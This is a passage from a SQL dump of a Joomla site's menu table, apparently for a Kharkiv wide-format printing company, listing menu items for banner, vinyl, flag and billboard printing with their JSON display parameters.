',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0444\\u043e\\u0442\\u043e \\u043d\\u0430 \\u0445\\u043e\\u043b\\u0441\\u0442\\u0435 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432. \\u041a\\u0430\\u0440\\u0442\\u0438\\u043d\\u044b \\u043d\\u0430 \\u043f\\u043e\\u0434\\u0440\\u0430\\u043c\\u043d\\u0438\\u043a\\u0435 \\u041d\\u0435\\u0434\\u043e\\u0440\\u043e\\u0433\\u043e.\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',51,56,0,'*',0),(8,'dop-menu','Печать на пленке','printing-on-vinyl','','printing-on-vinyl','index.php?option=com_content&view=article&id=7','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u043d\\u0430 \\u043f\\u043b\\u0435\\u043d\\u043a\\u0435 \\u0441\\u0430\\u043c\\u043e\\u043a\\u043b\\u0435\\u0439\\u043a\\u0435 (\\u043e\\u0440\\u0430\\u043a\\u0430\\u043b\\u0435). \\u0424\\u043e\\u0442\\u043e\\u043a\\u0430\\u0447\\u0435\\u0441\\u0442\\u0432\\u043e. 49\\u0433\\u0440\\u043d\\/\\u043c2\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',35,36,0,'*',0),(9,'dop-menu','Баннер печать','banner-printing','','banner-printing','index.php?option=com_content&view=article&id=8','component',1,1,1,22,62,'2021-08-12 14:05:55',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0411\\u0430\\u043d\\u043d\\u0435\\u0440\\u043e\\u0432 \\u041d\\u0435\\u0434\\u043e\\u0440\\u043e\\u0433\\u043e (\\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432) - \\u041b\\u044e\\u0431\\u043e\\u0433\\u043e \\u0440\\u0430\\u0437\\u043c\\u0435\\u0440\\u0430. \",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0431\\u0430\\u043d\\u043d\\u0435\\u0440\\u043e\\u0432, \\u043f\\u043e\\u0441\\u0442\\u0435\\u0440\\u043e\\u0432 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432 (\\u0434\\u043b\\u044f \\u0440\\u0435\\u043a\\u043b\\u0430\\u043c\\u044b \\u0438 \\u0438\\u043d\\u0442\\u0435\\u0440\\u044c\\u0435\\u0440\\u0430). \\u041b\\u044e\\u0431\\u043e\\u0433\\u043e \\u0440\\u0430\\u0437\\u043c\\u0435\\u0440\\u0430. \\u0417\\u0430 1-2 \\u0434\\u043d\\u044f. \\u0426\\u0435\\u043d\\u044b \\u043e\\u0442 \\u043f\\u0440\\u043e\\u0438\\u0437\\u0432\\u043e\\u0434\\u0438\\u0442\\u0435\\u043b\\u044f! \\u0414\\u043e\\u0441\\u0442\\u0430\\u0432\\u043a\\u0430 \\u043f\\u043e \\u0423\\u043a\\u0440\\u0430\\u0438\\u043d\\u0435.\",\"menu-meta_keywords\":\"\\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u043d\\u0430 \\u0431\\u0430\\u043d\\u043d\\u0435\\u0440\\u0435 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432, \\u0431\\u0430\\u043d\\u043d\\u0435\\u0440 \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c, \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u043f\\u043e\\u0441\\u0442\\u0435\\u0440\\u043e\\u0432\",\"robots\":\"\",\"secure\":0}',27,28,0,'*',0),(10,'dop-menu','Печать на сетке','printing-on-the-grid','','printing-on-the-grid','index.php?option=com_content&view=article&id=9','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u043d\\u0430 \\u0441\\u0435\\u0442\\u043a\\u0435 \\u0432 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\\u0435\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',59,62,0,'*',0),(11,'dop-menu','Печать фотографий','print-great-photos','','print-great-photos','index.php?option=com_content&view=article&id=10','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0431\\u043e\\u043b\\u044c\\u0448\\u0438\\u0445 \\u0444\\u043e\\u0442\\u043e\\u0433\\u0440\\u0430\\u0444\\u0438\\u0439 (\\u0431\\u043e\\u043b\\u044c\\u0448\\u0438\\u0445 \\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043e\\u0432)  \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',69,70,0,'*',0),(12,'other-menu','Изготовление рекламы','outdoor-advertising','','outdoor-advertising','index.php?option=com_content&view=article&id=11','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Изготовление наружной рекламы  в Харькове\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',29,30,0,'*',0),(13,'other-menu','Цифровая печать','digital-printing','','digital-printing','index.php?option=com_content&view=article&id=12','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Цифровая печать в Харькове\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',39,44,0,'*',0),(14,'dop-menu','Печать фотообоев','print-photo','','print-photo','index.php?option=com_content&view=article&id=13','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0444\\u043e\\u0442\\u043e\\u043e\\u0431\\u043e\\u0435\\u0432 - \\u0448\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0432 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\\u0435\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',75,76,0,'*',0),(15,'dop-menu','Печать флагов','print-flags','','print-flags','index.php?option=com_content&view=article&id=14','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u0424\\u043b\\u0430\\u0433\\u0438 - \\u0448\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0444\\u043b\\u0430\\u0433\\u043e\\u0432 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',79,80,0,'*',0),(16,'dop-menu','Печать ситилайтов','print-citylights','','print-citylights','index.php?option=com_content&view=article&id=15','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0441\\u0438\\u0442\\u0438\\u043b\\u0430\\u0439\\u0442\\u043e\\u0432 \\u0432 \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432\\u0435\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',87,88,0,'*',0),(18,'dop-menu','Печать на тенте','printing-on-an-awning','','printing-on-an-awning','index.php?option=com_content&view=article&id=17','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u043d\\u0430 \\u0442\\u0435\\u043d\\u0442\\u0435 (\\u0431\\u0430\\u043d\\u043d\\u0435\\u0440 \\u0434\\u043b\\u044f \\u043c\\u0430\\u0448\\u0438\\u043d) \",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',89,92,0,'*',0),(19,'dop-menu','Печать бигбордов','print-billboards','','print-billboards','index.php?option=com_content&view=article&id=18','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\\u041f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0431\\u0438\\u043b\\u0431\\u043e\\u0440\\u0434\\u043e\\u0432 \\\\| \\u0431\\u0438\\u0433\\u0431\\u043e\\u0440\\u0434\\u043e\\u0432\",\"show_page_title\":0,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',33,34,0,'*',0),(20,'mainmenu','Доставка','delivery','','delivery','index.php?option=com_content&view=article&id=19','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"Доставка широкоформатной печати по Украине и Харькову\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',37,38,0,'*',0),(21,'other-menu','Широкоформатная печать в Днепропетровске — ЭкваторПринт','printing-in-dnepropetrovsk','','printing-in-dnepropetrovsk','index.php?option=com_content&view=article&id=20','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',49,50,0,'*',0),(22,'other-menu','Широформатная печать в Одессе — ЭкваторПринт','printing-in-odessa','','printing-in-odessa','index.php?option=com_content&view=article&id=21','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',63,64,0,'*',0),(23,'other-menu','Широкоформатная печать в Киеве — ЭкваторПринт','printing-in-kyiv','','printing-in-kyiv','index.php?option=com_content&view=article&id=22','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',67,68,0,'*',0),(24,'other-menu','Широкоформатная печать в Запорожье — ЭкваторПринт','printing-in-zaporozhje','','printing-in-zaporozhje','index.php?option=com_content&view=article&id=23','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',71,72,0,'*',0),(25,'other-menu','Широкоформатная печать в Донецке — ЭкваторПринт','printing-in-doneck','','printing-in-doneck','index.php?option=com_content&view=article&id=24','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',81,82,0,'*',0),(26,'other-menu','Широкоформатная печать в Харькове — ЭкваторПринт','printing-in-kharkov','','printing-in-kharkov','index.php?option=com_content&view=article&id=25','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"feed_summary\":\"\",\"page_title\":\"\",\"show_page_title\":1,\"pageclass_sfx\":\"\",\"menu_image\":\"\",\"secure\":0,\"show_page_heading\":0}',85,86,0,'*',0),(28,'mainmenu','Требования к макету','trebovaniya','','trebovaniya','index.php?option=com_content&view=article&id=26','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',65,66,0,'*',0),(29,'other-menu','Видео','video','','video','index.php?option=com_content&view=article&id=27','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_associations\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_tags\":\"\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',83,84,0,'*',0),(30,'mainmenu','Услуги','home','','home','index.php?option=com_content&view=article&id=4','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_associations\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_tags\":\"\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\\u0428\\u0438\\u0440\\u043e\\u043a\\u043e\\u0444\\u043e\\u0440\\u043c\\u0430\\u0442\\u043d\\u0430\\u044f \\u043f\\u0435\\u0447\\u0430\\u0442\\u044c \\u0425\\u0430\\u0440\\u044c\\u043a\\u043e\\u0432 \\u043f\\u043e \\u0421\\u0430\\u043c\\u044b\\u043c \\u041d\\u0438\\u0437\\u043a\\u0438\\u043c \\u0426\\u0435\\u043d\\u0430\\u043c\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',15,16,1,'*',0),(102,'main','com_banners','Banners','','Banners','index.php?option=com_banners','component',1,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,2,0,'*',1),(103,'main','com_banners','Banners','','equipment/Banners','index.php?option=com_banners','component',1,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',18,19,0,'*',1),(104,'main','com_banners_categories','Categories','','equipment/Categories','index.php?option=com_categories&extension=com_banners','component',1,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',20,21,0,'*',1),(105,'main','com_banners_clients','Clients','','equipment/Clients','index.php?option=com_banners&view=clients','component',1,2,2,4,0,'0000-00-00 